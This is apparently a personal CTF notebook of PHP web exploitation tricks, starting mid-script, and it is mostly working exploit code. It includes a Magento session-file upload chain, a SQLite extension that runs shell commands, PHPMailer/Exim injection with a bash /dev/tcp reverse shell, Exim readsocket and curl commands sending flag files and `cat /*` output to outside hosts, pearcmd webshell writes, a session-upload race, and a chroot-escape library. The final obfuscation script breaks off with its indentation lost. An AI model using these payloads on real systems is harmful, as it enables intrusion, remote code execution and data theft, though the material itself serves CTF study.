            name_match = re.search(r"\$([A-Za-z_][A-Za-z0-9_]*)", token)
            if not name_match:
                continue
            param_name = name_match.group(1)
    
            parts = token.split()
            type_hint = None
            for part in parts:
                if part.startswith("&"):
                    continue
                if part.startswith("..."):
                    continue
                if part.startswith("$"):
                    break
                type_hint = part
            if not type_hint:
                continue
    
            resolved = resolve_type(type_hint, info.namespace, info.use_map)
            if resolved:
                results.append((param_name, resolved))
    
        return results
    
    
    def extract_method_parameters(class_name: str, method_name: str) -> List[Tuple[str, str]]:
        queue: deque[str] = deque([class_name.lstrip("\\")])
        visited: Set[str] = set()
    
        while queue:
            current = queue.popleft()
            if current in visited:
                continue
            visited.add(current)
    
            info = get_class_info(current)
            if not info:
                continue
    
            params = _parse_method_parameters(info, method_name)
            if params is not None:
                return params
    
            if info.parent:
                queue.append(info.parent.lstrip("\\"))
    
        return []
    
    
    def load_webapi_sources() -> List[Endpoint]:
        endpoints: List[Endpoint] = []
    
        if not os.path.exists(WEBAPIS_LIST_PATH):
            return endpoints
    
        with open(WEBAPIS_LIST_PATH, "r", encoding="utf-8") as handle:
            for raw_line in handle:
                line = raw_line.strip()
                if not line or line.startswith("#"):
                    continue
    
                abs_path = os.path.normpath(os.path.join(SCRIPT_DIR, line))
                if not os.path.isfile(abs_path):
                    continue
    
                try:
                    tree = ET.parse(abs_path)
                except ET.ParseError:
                    continue
    
                root = tree.getroot()
                for route in root.findall(".//route"):
                    service = route.find("service")
                    resources = route.find("resources")
    
                    if service is None or resources is None:
                        continue
    
                    if not any(
                        res.attrib.get("ref") == "anonymous"
                        for res in resources.findall("resource")
                    ):
                        continue
    
                    service_class = service.attrib.get("class")
                    service_method = service.attrib.get("method")
    
                    if (
                        not service_class
                        or not service_method
                        or service_method == "DEFAULT"
                    ):
                        continue
    
                    endpoints.append(
                        Endpoint(
                            url=route.attrib.get("url", ""),
                            http_method=route.attrib.get("method", ""),
                            service_class=service_class.lstrip("\\"),
                            service_method=service_method,
                        )
                    )
    
        return endpoints
    
    
    def main() -> int:
        di_mapping = load_di_mapping()
        endpoints = load_webapi_sources()
    
        if not endpoints:
            print("No anonymous web API endpoints detected; nothing to scan.")
            return 0
    
        hits: List[Tuple[Endpoint, List[List[str]]]] = []
    
        for endpoint in endpoints:
            endpoint_paths: List[List[str]] = []
            seen_paths: Set[Tuple[str, ...]] = set()
            service_concretes = resolve_concretes(endpoint.service_class, di_mapping)
    
            for concrete in service_concretes:
                params = extract_method_parameters(concrete, endpoint.service_method)
                if not params:
                    continue
    
                for param_name, param_type in params:
                    param_concretes = resolve_concretes(param_type, di_mapping)
                    if not param_concretes:
                        continue
    
                    for concrete_param in param_concretes:
                        path = find_constructor_path(concrete_param, di_mapping)
                        if not path:
                            continue
    
                        chain: List[str] = [f"${param_name}: {param_type}"]
    
                        if path[0] != param_type:
                            chain.append(path[0])
                        chain.extend(path[1:])
    
                        key = tuple(chain)
                        if key not in seen_paths:
                            seen_paths.add(key)
                            endpoint_paths.append(chain)
    
            if endpoint_paths:
                hits.append((endpoint, endpoint_paths))
    
        if not hits:
            print(
                "No anonymous web API services reach Magento\\Framework\\Url via constructor injection."
            )
            return 0
    
        hits.sort(
            key=lambda item: (
                item[0].http_method,
                item[0].url,
                item[0].service_class,
                item[0].service_method,
            )
        )
    
        for endpoint, paths in hits:
            print(
                f"{endpoint.http_method} {endpoint.url} :: "
                f"{endpoint.service_class}::{endpoint.service_method}"
            )
            for idx, chain in enumerate(paths, 1):
                print(f"  Path {idx}:")
                for node in chain:
                    print(f"    -> {node}")
            print()
    
        return 0
    
    
    if __name__ == "__main__":
        sys.exit(main())
    

    在所有路径中找了一条最短的路径,移除涉及payment类的路径,如下

    POST /V1/guest-carts/:cartId/billing-address :: Magento\Quote\Api\GuestBillingAddressManagementInterface::assign
      Path 1:
        -> $address: Magento\Quote\Api\Data\AddressInterface
        -> Magento\Quote\Model\Quote\Address
        -> Magento\Directory\Helper\Data
        -> Magento\Framework\App\Helper\Context
        -> Magento\Backend\Model\Url
        -> Magento\Framework\Url

    不难将这个指定session file的漏洞和已知文件上传漏洞串联起来,利用脚本如下

    import requests
    import os
    
    target = 'http://60.205.163.215:32640'
    
    FORMKEY = os.popen("cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1").read().strip()
    SESSID = os.popen("cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 26 | head -n 1").read().strip()
    print(f"[+] Using form_key: {FORMKEY}")
    print(f"[+] Using session_id: {SESSID}")
    
    # docker run --rm -v .:/mnt phpgc -se -pub -a Guzzle/FW1 /proc/self/cwd/index.php /mnt/payload.php > exp.sess
    
    url = f"{target}/customer/address_file/upload"
    files = {
        'custom_attributes[country_id]': (f'sess_{SESSID}', open('exp.sess', 'rb'), 'application/octet-stream'),
    }
    data = {
        'form_key': FORMKEY,
    }
    cookies = {
        'form_key': FORMKEY,
    }
    response = requests.post(url, files=files, data=data, cookies=cookies)
    print(response.text)
    
    url = f"{target}/rest/default/V1/guest-carts/abc/billing-address"
    data = {
        "address": {
            "directoryData": {
                "context": {
                    "urlBuilder": {
                        "session": {
                            "sessionConfig": {
                                "savePath": f"media/customer_address/s/e"
                            }
                        }
                    }
                }
            }
        }
    }
    response = requests.post(url, json=data, cookies={'PHPSESSID': SESSID})
    print(response.text)
    
    Image

    PHP Sandbox bypass using PDO SQLite

    Event NameXCTF 2025
    GitHub URL-
    Challenge Namei forgot the challenge name
    Attachments
    References

    tl;dr about the challenge

    solution
    import httpx
    import asyncio
    import subprocess
    import base64
    import os
    
    URL = "http://localhost:12345/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.AsyncClient(base_url=url, timeout=10000)
    
        def eval(self, code: str) -> str:
            return self.c.get(
                "/",
                params={"eval": code}
            )
    
    class API(BaseAPI):
        ...
    
    async def upload_base64_file(api: BaseAPI, b64_content: str, remote_path: str, chunk_size: int = 4000):
        """Upload base64 in 4-char-aligned chunks to a .b64 file, then decode once."""
        if chunk_size % 4 != 0:
            chunk_size -= (chunk_size % 4)
            if chunk_size <= 0:
                chunk_size = 4
    
        b64_path = remote_path + '.b64'
    
        total = len(b64_content)
        first = True
        for i in range(0, total, chunk_size):
            chunk = b64_content[i:i+chunk_size]
            php = (
                "file_put_contents('%s','%s');echo 'ok';"
                if first else
                "file_put_contents('%s','%s',FILE_APPEND);echo 'ok';"
            ) % (b64_path, chunk)
            r = await api.eval(php)
            _ = r.text
            first = False
    
        decode = await api.eval(
            """
    $b64 = file_get_contents('%s');
    file_put_contents('%s', base64_decode($b64));
    clearstatcache();
    $s = @filesize('%s');
    var_dump($s !== false ? ('size=' . $s) : 'size_error');
            """ % (b64_path, remote_path, remote_path)
        )
        print(decode.text.strip())
    
    def build_shared_object():
        """Build the shared object and return base64 encoded content"""
        c_file = "hello.c"
        so_file = "libhello_fd.so"
        
        # Create the C source if it doesn't exist
        if not os.path.exists(c_file):
            c_source = '''#include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3ext.h>
    
    SQLITE_EXTENSION_INIT1
    
    // Simple function that prints "Hello from shared object!"
    static void hello_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
        sqlite3_result_text(context, "Hello from shared object!", -1, SQLITE_STATIC);
    }
    
    // Function to execute system commands and return output
    static void exec_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
        if (argc < 1) {
            sqlite3_result_error(context, "exec_function requires one argument", -1);
            return;
        }
        
        const char *command = (const char*)sqlite3_value_text(argv[0]);
        if (command == NULL) {
            sqlite3_result_error(context, "exec_function: invalid command", -1);
            return;
        }
        
        // Execute command and capture output
        FILE *fp = popen(command, "r");
        if (fp == NULL) {
            sqlite3_result_error(context, "Failed to execute command", -1);
            return;
        }
        
        char buffer[4096];
        char output[8192] = "";
        
        while (fgets(buffer, sizeof(buffer), fp) != NULL) {
            strncat(output, buffer, sizeof(output) - strlen(output) - 1);
        }
        
        int exit_code = pclose(fp);
        
        // If we got output, return it; otherwise return exit code info
        if (strlen(output) > 0) {
            sqlite3_result_text(context, output, -1, SQLITE_TRANSIENT);
        } else {
            char result_str[128];
            snprintf(result_str, sizeof(result_str), "Command executed with exit code: %d", exit_code);
            sqlite3_result_text(context, result_str, -1, SQLITE_STATIC);
        }
    }
    
    // Extension entry point
    int sqlite3_hellofd_init(sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi) {
        SQLITE_EXTENSION_INIT2(pApi);
        
        // Register our custom functions
        sqlite3_create_function(db, "hello", 0, SQLITE_UTF8, 0, hello_function, 0, 0);
        sqlite3_create_function(db, "exec_cmd", 1, SQLITE_UTF8, 0, exec_function, 0, 0);
        
        return SQLITE_OK;
    }'''
            
            with open(c_file, 'w') as f:
                f.write(c_source)
            print(f"Created {c_file}")
        
        # Compile the shared object
        compile_cmd = [
            "gcc", 
            "-shared", 
            "-fPIC", 
            "-o", so_file,
            c_file,
            "-lsqlite3"
        ]
        
        try:
            print(f"Compiling {c_file} into {so_file}...")
            result = subprocess.run(compile_cmd, check=True, capture_output=True, text=True)
            print(f"Successfully compiled {so_file}")
        except subprocess.CalledProcessError as e:
            print(f"Compilation failed: {e}")
            print(f"Error output: {e.stderr}")
            return None
        except FileNotFoundError:
            print("Error: gcc not found. Please install gcc to compile the shared object.")
            return None
        
        # Read and encode the shared object
        try:
            with open(so_file, 'rb') as f:
                so_content = f.read()
                return base64.b64encode(so_content).decode()
        except Exception as e:
            print(f"Error reading {so_file}: {e}")
            return None
        finally:
            os.remove(c_file)
            os.remove(so_file)
    
    async def main():
        api = API()
        print("=== Building Shared Object ===")
        
        # Build the shared object
        payload_content = build_shared_object()
        if not payload_content:
            print("Failed to build shared object!")
            return
        
        print(f"Base64 content length: {len(payload_content)} characters")
        print("=== Uploading and Executing ===")
        
        # Upload the shared object in chunks to avoid 414
        print("Uploading shared object in chunks...")
        await upload_base64_file(api, payload_content, '/tmp/libhello_fd.so', chunk_size=4000)
        
        # Load and test the extension
        print("Loading extension and testing...")
        res = await api.eval(r"""
    error_reporting(-1);
    try {
        $db = new Pdo\Sqlite('sqlite::memory:');
        $db->loadExtension('/tmp/libhello_fd.so');
        var_dump("Extension loaded successfully");
        
        // Test our custom functions
        $result = $db->query("SELECT hello()")->fetchColumn();
        var_dump("hello() result: " . $result);
        
        // Test exec function with different commands
        $commands = [
            'cat /flag.txt',
        ];
        
        foreach ($commands as $cmd) {
            $exec_result = $db->query("SELECT exec_cmd('" . $cmd . "')")->fetchColumn();
            var_dump("exec_cmd('" . $cmd . "'): " . $exec_result);
        }
        
    } catch (Throwable $e) {
        var_dump("Error: " . $e->getMessage());
    }
    """)
        print(res.text)
    
    if __name__ == "__main__":
        asyncio.run(main())

    Php trick

    Event NameLine CTF 2025
    GitHub URL-
    Challenge NameRestricted Proxy
    Attachments
    References

    Image
    solve
    import httpx
    import asyncio
    from urllib.parse import quote
    
    URL = "http://136.110.79.68:10002"
    URL = "http://localhost:10002"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.AsyncClient(base_url=url)
        
        def home_post(self, data):
            return self.c.post("/", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
    
    class API(BaseAPI):
        ...
    
    async def main():
        api = API()
        q = quote(r"flag?cmd=(f)&fmt={0:[w:=iter(w)]}")
        print(q)
        res = await api.home_post("submit=1&host=nginx&path=get%0a&params="+q+"&token_header=:X-From-Restric&token=ted-Proxy:8007370437")
        print(res.text)
    
    if __name__ == "__main__":
        asyncio.run(main())
    

    Phar is still possible in php 8 if via include(…) and phar can be gziped and be payload.phar.gz and still work

    Event NameDEADSEC 2025
    GitHub URL-
    Challenge Namebaby-web
    Attachments
    References

    <?php
    $phar = new Phar('exploit.phar');
    $phar->startBuffering();
    
    $stub = <<<'STUB'
    <?php
        system('/readflag');
        __HALT_COMPILER();
    ?>
    STUB;
    
    $phar->setStub($stub);
    $phar->addFromString('dummy.txt', 'dummy');
    $phar->stopBuffering();
    
    ?>

    gzip the payload. upload and include with /index.php?url=payload.phar.gz

    PHP Mailer CVE 2016 with EXIM4

    Event NameIERAE CTF 2025
    GitHub URL-
    Challenge NameCokePHP
    Attachments
    References

    GET /debug/<@urlencode_all><@urlencode_all>Debug/var/www/src/modules/debug.php:5$0</@urlencode_all></@urlencode_all>/phpinfo/CONFIG_CONFIG_module_namespace/<@urlencode_all>%00<@urlencode_all>App\Modules</@urlencode_all></@urlencode_all> HTTP/1.1

    PHP Mailer CVE 2016 with EXIM4

    Event NameMidnight Sun CTF 2025 Quals
    GitHub URL-
    Challenge NameUselessCorp
    Attachments
    References

    solve 1

    Here's the script I used for ACE on uselesscorp:

    import requests
    import base64
    
    REV_SHELL_IP = '10.20.30.40'
    REV_SHELL_PORT = 1337
    
    HOST = '<http://localhost/>'
    # HOST = '<https://useless-94tszh4z.ctf.pro>'
    sess = requests.Session()
    
    def send_mail(email: str):
        data = {
            'name': 'a',
            'email': email,
            'subject': 'cool',
            'message': 'Important message',
            'submit': 'submit',
        }
    
        print(f'Sending {email = }')
        sess.post(HOST + '/index.php', data=data)
    
    def run_cmd(cmd: str):
        exploit = '${run,preexpand{${base64d:' + base64.b64encode(cmd.encode()).decode() + '}}}'
        send_mail('"a\\\\" -be ' +  exploit + ' "@a')
    
    # Delete /tmp/a first in case it exists. Convenience, because we're appending later
    run_cmd("/bin/rm /tmp/a")
    
    # Then write our target command to `/tmp/a` one char at a time:
    TARGET_CMD = f"""
    /bin/bash -i >& /dev/tcp/{REV_SHELL_IP}/{REV_SHELL_PORT} 0>&1
    """.strip()
    
    assert "'" not in TARGET_CMD and '"' not in TARGET_CMD
    for c in TARGET_CMD:
        run_cmd(f'''/bin/sh -c "echo -n '{c}'>>/tmp/a"''')
    
    # Now we execute the file we've written
    run_cmd("/bin/bash /tmp/a")
    
    # And clean up at the end
    run_cmd("/bin/rm /tmp/a")
    
    solve 2
    curl -X POST https://useless-94tszh4z.ctf.pro -d 'name=a' -d 'subject=a' -d 'message=a' -d 'submit=submit' -d 'email="\" -be ${readsocket{inet:0.tcp.ap.ngrok.io:19066}{${readfile{/flag.txt}}}} "@x'
    solve 3

    TLDR writeup for Uselesscorp

  • Find endpoint /includes from the style css
  • See that it has file class.phpmailer.php
  • Find out that it is v5.2.17 from size and date of file.
  • See that it's vulnerable to CVE 2016-10033
  • Apache tells us that it's using Debian
  • Find out that Debian uses Exim4 (for sendmail)
  • Spend time debugging why it doesn't work
  • Replicate environment with exim4 and apache in docker.
  • Find this Github README and translate to english https://github-com.translate.goog/yaofeifly/Vub_ENV/blob/ac981ca3ca2be324f011ef2ddc32a0da094c4599/WordPress_CVE-2016-10033/README.md?_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp (Select auto-detect language)
  • See that it mentions EXIM4 strings using be
  • Find documentation https://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html
  • Try out ${readsockets{message_here}} with ngrok
    • It does work!
  • Then use ${readfile{/flag.txt}} to get flag content
  • Combine both for exploit
    • ${readsocket{inet:ngrok.url.here:ngrok.port}{${readfile{/flag.txt}}}}
  • Win!
  • peclcmd.php to get code execution without write a file and with write a file


    Without write a file

    GET /?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r"system(hex2bin('PAYLOAD'));"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt HTTP/1.1
    
    GET /?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r`sleep$\{IFS\}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt HTTP/1.1
    ../../../../../../../../../../usr/local/lib/php/peclcmd
    +run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt
    ../../../../../../../../../../usr/local/lib/php/peclcmd&x=+run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt

    With write a file

    curl "https://filestore.web.actf.co/?f=../../../../usr/local/lib/php/pearcmd.php&+-c+/tmp/foo.php+-d+man_dir=><?echo(system(\\$_GET\\['a'\\]));?>+-s+"
    
    curl "http://172.26.119.33:9100/wp-content/plugins/kiwiblocks/src/admin-panel/views/panel.php?tab=../../../../../../../../../../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r\"system(hex2bin('$(echo "curl 77.37.47.226:4444 -d \"`cat /*`\"" | hexdump -v -e '/1 "%02x"' | tr -d '\n')'));\"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt"

    PHP Extract + Dompdf Options

    Event NameCyber Jawara National 2024
    GitHub URL-
    Challenge NameName Card
    Attachments

    data%5Bname%5D=a&data%5BphotoUrl%5D=https://letsenhance.io/static/73136da51c245e80edc6ccfe44888a99/1015f/MainBefore.jpg<?=system('ls');?>&data%5Bemail%5D=aa%40mail.com&data%5Bphone%5D=08111111111111&data%5Baddress%5D=aaaaaaaaaaaa&data[config][isRemoteEnabled]=1&data[config][logOutputFile]=/var/www/html/log.php&data[config][debugPng]=1&data[config][debugCss]=1

    Case insensitive function call

    Event NamePatchstack Alliance CTF S02E01 - WordCamp Asia
    GitHub URL-
    Challenge NameCool Templates
    Attachments
    References

    We can call php function case insesitifly. example System() will be treated as system()

    php filter bypass

    Filter Madness - web

    Image
    Image

    Based on the provided images, here is the exact text contained within them:

    Image 1 (image_c7e677.png)

    Input

    Plaintext

    resource=data:,14
    zombies for the flag
    0
    |dechunk

    Output

    Plaintext

    resource=data:,14%0Azombies%20for%20the%20flag%0A0%0A%7Cdechunk

    Image 2 (image_c7e559.png)

    Browser URL Bar

    Plaintext

    https://filter-madness-tlejfksioa-ul.a.run.app/?madness=resource=data:,14%0Azombies%20for%20the%20flag%0A0%0A%7Cdechunk

    Page Content

    Plaintext

    Warning: file_get_contents(): Unable to locate filter "resource=data:,14 zombies for the flag 0 " in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to create filter (resource=data:,14 zombies for the flag 0 ) in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to locate filter "resource=" in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to create filter (resource=) in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to locate filter "etc" in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to create filter (etc) in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to locate filter "passwd" in /var/www/html/index.php on line 11
    
    Warning: file_get_contents(): Unable to create filter (passwd) in /var/www/html/index.php on line 11
    Can you submit some madness that will return the flag?
    
    Your filter madness: php://filter/resource=data:,14 zombies for the flag 0 |dechunk/resource=/etc/passwd
    Your filter madness length: 83
    Your filter madness results: wctf{m4y6e-th15-15-4-6u9-1n-php-83047}

    Bypass Exit in php, php file upload if we can manipulate the start of the file_put_contents posibility to use php filter chain

    Event NamePatchstack Alliance CTF S02E01 - WordCamp Asia
    GitHub URL-
    Challenge NameBlocked
    Attachments
    References

    $write = <<<EOF
        <?php
            exit('ha?');
            // $content
    
    EOF;
    
    file_put_contents($name . '.php', $write);

    it’s possible to gain rce in this kind of code if we can manipulate $name, we can use php filter chain.

    imagepng is one of many function that we can use php filter chain to manipulate it’s output if we can manipulate start of the filename

    Event NamePatchstack Alliance CTF S02E01 - WordCamp Asia
    GitHub URL-
    Challenge NameSneaky
    Attachments
    References

    LessPHP 0day version "wikimedia/less.php": "5.2.1", if we can controll the SetImportDirs

    Event NamePWNME CTF Quals 2025
    GitHub URLhttps://github.com/Phreaks-2600/PwnMeCTF-2025-quals/blob/main/Web/Pwnshop/solve/README.md
    Challenge NamePwnshop
    Attachments
    References

    if (file_exists($customLessPath)) {
        $customLess = file_get_contents($customLessPath);
        $parser = new \Less_Parser();
        $importDirs = $this->getImportDirectories();
        $parser->SetImportDirs($importDirs);
        $parser->parse($customLess);
        $customCSS = $parser->getCss();
        $css .= "\n/* Custom CSS */\n" . $customCSS;
    }
    

    PHP SESSION UPLOAD PROGRESS SESSION FILE WRITE

    https://book.hacktricks.xyz/pentesting-web/file-inclusion/via-php_session_upload_progress

    not working if as example require $path.".php" appended with .php

    solver
    import httpx
    import asyncio
    
    URL = "http://localhost"
    CMD = "dir"
    # change to php session location, eg: /var/lib/php/sessions or /tmp or /xampp/tmp
    SESSION_LOCATION = "/xampp/tmp"
    SESSION_NAME = "sebastian"
    FILE_SIZE = 1_000_000
    REQUEST_NUM = 100
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.AsyncClient(base_url=url, timeout=999)
    
        def lfi(self, file, cmd):
            return self.c.post(f"/wp-admin/admin-ajax.php?action=nopriv_geo_mashup_query&object_ids=1&object_name=&template=../../../../../../../../../..{SESSION_LOCATION}&cmd={cmd}")
    
    class API(BaseAPI):
        async def upload_shell(self):
            payload='success<?php system($_GET["cmd"])?>'
            res = await self.c.post("/", files={"f": ("foo", "A"*FILE_SIZE)}, data={
                'PHP_SESSION_UPLOAD_PROGRESS':  payload
            }, headers = {
                'Cookie': 'PHPSESSID='+SESSION_NAME
            })
            return res
    
    async def main():
        api2 = API()
        api = API()
        triggered = False
        while triggered == False:
            pool = []
            for _ in range(REQUEST_NUM):
                pool.append(api.upload_shell())
            for _ in range(REQUEST_NUM):
                pool.append(api2.lfi(SESSION_LOCATION+"/sess_"+SESSION_NAME, CMD))
            ress = await asyncio.gather(*pool)
            for res in ress:
                if "success" in res.text:
                    print(res.text)
                    triggered = True
                    break
    
    if __name__ == "__main__":
        asyncio.run(main())

    RCE via HTML Template Injection in require()

    if there a html injection + require gadget, we can use this to gain RCE using that template injection by bruteforcing the file descriptor that render the html injection

    PHP Reflection class

    Unsecure (TCP1P CTF 2023)

    <?php
    
    include 'GadgetOne/Adders.php';
    include 'GadgetTwo/Echoers.php';
    include 'GadgetThree/Vuln.php';
    
    use GadgetOne\\Adders;
    use GadgetTwo\\Echoers;
    use GadgetThree\\Vuln;
    
    /* Gadget Three */
    $vuln = new Vuln();
    
    $vuln->waf1 = 1;
    
    $reflection2 = new \\ReflectionProperty(get_class($vuln), 'waf2');
    $reflection2->setAccessible(true);
    $reflection2->setValue($vuln, "\\xde\\xad\\xbe\\xef");
    
    # $vuln->cmd = "system('ls -alh');";
    $vuln->cmd = "system('cat 182939124819238912571292389218129123.txt');echo '\\n';";
    
    /* Gadget One */
    $adder=new Adders($vuln);
    
    /* Gadget Two */
    $echoers = new Echoers();
    
    $reflection3 = new \\ReflectionProperty(get_class($echoers), 'klass');
    $reflection3->setAccessible(true);
    $reflection3->setValue($echoers, $adder);
    
    $serialized = serialize($echoers);
    
    echo base64_encode($serialized);
    echo "\\n\\n";
    

    Bypassing PHP Openssl_descrypt mode aes-128-gcm authentication using one byte $tag technique (TSGCTF2023) (DANCE)

    <?php
    $auth = "guest";
    $cipher = "aes-128-gcm";
    $key = "asdkwosqdiwq";
    $ivlen = openssl_cipher_iv_length($cipher);
    $iv = "qwinviwjeqwoqw";
    $encrypted_auth = openssl_encrypt($auth, $cipher, $key, $options = 0, $iv, $tag);
    echo "guest enc";
    var_dump($encrypted_auth);
    
    $decoded = base64_encode((base64_decode($encrypted_auth) ^ "guest")^"admin") ;
    
    echo "Admin tamper enc ";
    var_dump($decoded);
    
    echo "tag before ";
    var_dump($tag);
    
    
    for ($i=0;$i<255;$i++){
        $tag = chr($i);
        $encrypted = openssl_decrypt($decoded,$cipher,$key,0,$iv,$tag);
        if ($encrypted){
            echo "tag matched ";
            var_dump($tag);
            echo "decode our tampered admin cookie ";
            var_dump($encrypted);
        }
    
    }
    

    https://hackmd.io/@Ud2Y6umGS0e2DCVusYcQ3w/r15gGTNXa

    dari writeup ditas kita bisa simpulkan bahwa kita bisa mentaper $tag nya dengan menebak bytes pertama saja ini dikarnakan fungsi openssl_decrypt di php tidak melakukan pengecekan length dari $tag sehingga kita bisa memberi 1 byte ke openssl_decrypt membuat openssl_decrypt hanya me-matching 1 byte dari original $tag

    Int trim in PHP

    php > echo (int) "12asd";
    12
    

    Maybe unserialize

    jadi klo make func maybe_unserialize itu pasti bakalan nge-serialize lagi dari input yang formatnya udah serialized. misal nginput object, ntar bakalan di serialized lagi jadi string

    nah, menariknya.. ini bisa dilewati dengan cara ga make ; atau } ntar tetep jadi object. Cuma menariknya lagiii, kalau make fungsi unserialize itu tetep bisa nge-unserialize serialized yang ga complete (missing ; atau })

    ex:

    <?php
    
    class Flag
    {
        private $msg;
    
        public function __wakeup(): void
        {
            require "flag.php";
            $this->msg = $flag;
            $this->printFlag();
        }
    
        public function printFlag()
        {
            print($this->msg);
        }
    }
    
    function maybe_serialize($data)
    {
        if (is_array($data) || is_object($data)) {
            return serialize($data);
        }
    
        if (is_serialized($data, false)) {
            return serialize($data);
        }
    
        return $data;
    }
    
    
    function is_serialized($data, $strict = true)
    {
        // If it isn't a string, it isn't serialized.
        if (!is_string($data)) {
            return false;
        }
        $data = trim($data);
        if ('N;' === $data) {
            return true;
        }
        if (strlen($data) < 4) {
            return false;
        }
        if (':' !== $data[1]) {
            return false;
        }
        if ($strict) {
            $lastc = substr($data, -1);
            if (';' !== $lastc && '}' !== $lastc) {
                return false;
            }
        } else {
            $semicolon = strpos($data, ';');
            $brace     = strpos($data, '}');
            var_dump($data);
            var_dump($semicolon.$brace);
            // Either ; or } must exist.
            if (false === $semicolon && false === $brace) {
                return false;
            }
            // But neither must be in the first X characters.
            if (false !== $semicolon && $semicolon < 3) {
                return false;
            }
            if (false !== $brace && $brace < 4) {
                return false;
            }
        }
        $token = $data[0];
        switch ($token) {
            case 's':
                if ($strict) {
                    if ('"' !== substr($data, -2, 1)) {
                        return false;
                    }
                } elseif (!str_contains($data, '"')) {
                    return false;
                }
                // Or else fall through.
            case 'a':
            case 'O':
            case 'E':
                return (bool) preg_match("/^{$token}:[0-9]+:/s", $data);
            case 'b':
            case 'i':
            case 'd':
                $end = $strict ? '$' : '';
                return (bool) preg_match("/^{$token}:[0-9.E+-]+;$end/", $data);
        }
        return false;
    }
    
    
    
    // $user_input = serialize(new Flag());
    $user_input = "O:4:\\"Flag\\":0:{";
    $serialized_result = maybe_serialize($user_input);
    var_dump(json_encode($user_input));
    var_dump($user_input);
    var_dump($serialized_result);
    
    var_dump(unserialize($serialized_result));
    // var_dump(unserialize($user_input));
    
    

    Change root director

    in php we can change root directory usign chroot(); if chroot is changed, it's possible for us to change configuration of the php, and potentialy bypass open_basedir. but there's so many restriction to using chroot like you need root privilage and you need to use php cli to run your script. You can obtain more information about chroot here https://www.php.net/manual/en/function.chroot.php

    ASIS CTF 2023 final challenge phphphphp

    dl, load a malcious php library

    ASIS CTF 2023 final challenge phphphphp

    you can use dl to load a malcious library, but you need to use php cli or something with enable_dl=true

    example payload:

    from asis ctf challenge phphphphphp

    from pwn import *
    import time, base64, os
    
    with open("foo.c", "wb") as f:
        f.write(b"""
        #include <stdlib.h>
        #include <sys/stat.h>
        #include <unistd.h>
        #include <stdio.h>
    
        static void foo() __attribute__((constructor));
        void foo(void)
        {
            puts("pwned\\\\n");
    
            mkdir("chroot-dir", 0755);
            chroot("chroot-dir");
            // escape from chroot
            for(int i = 0; i < 1000; i++) {
                chdir("..");
            }
            chroot(".");
            system("cat /flag.txt");
        }
        """)
    os.system("gcc -o libfoo.so -shared foo.c")
    
    libfoo = open("libfoo.so", "rb").read()
    payload = b"""
    <?php
    $libfoo = "###DATA###";
    $libfoo = base64_decode($libfoo);
    chroot("/tmp");
    mkdir("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831", 0777, true);
    file_put_contents("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831/foo.so", $libfoo);
    chmod("/var/www/sbx/usr/local/lib/php/extensions/no-debug-non-zts-20230831/foo.so", 0777);
    chroot("/var/www/sbx");
    dl("foo");
    ?>
    """.strip()
    
    payload = payload.replace(b"###DATA###", base64.b64encode(libfoo))
    
    while True:
        with remote("3.75.187.223", 7321, level="debug") as io:
            line = io.recv()
            if b"one try every" in line:
                print("timeout from ip, waiting")
                time.sleep(5)
                continue
            print(line)
    
            print("sending payload")
            io.sendline(str(len(payload)).encode())
            io.send(payload)
            io.interactive()
            break
    

    full phphphphphp solvee script

    PHP Obfuscation (Stress Release Service TETCTF 2024)

    string_code = ['system','cat s*']
    
    obfuscated_code = ""
    
    charset = ["\\\\","'",".","?",'(',')', '^']
    
    
    
    def escape_char(s):
    
    to_escape = {
    
    "'": "\\\\'",
    
    "\\\\": "\\\\\\\\"
    
    }
    
    if s in to_escape:
    
    return to_escape[s]
    
    else:
    
    return s
    
    
    
    
    def search(s):
    
    for j in charset:
    
    for k in charset:
    
    for l in charset:
    
    for m in charset:
    
    for n in charset:
    
    for o in charset:
    
    for p in charset:
    
    if ord(j) ^ ord(k) == ord(s):
    
    return ".('%s'^'%s')" % (escape_char(j), escape_char(k))
    
    if ord(j) ^ ord(k) ^ ord(l) == ord(s):
    
    return ".('%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l))
    
    if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) == ord(s):
    
    return ".('%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m))
    
    if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) == ord(s):
    
    return ".('%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n))
    
    if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) ^ ord(o) == ord(s):
    
    return ".('%s'^'%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n), escape_char(o))
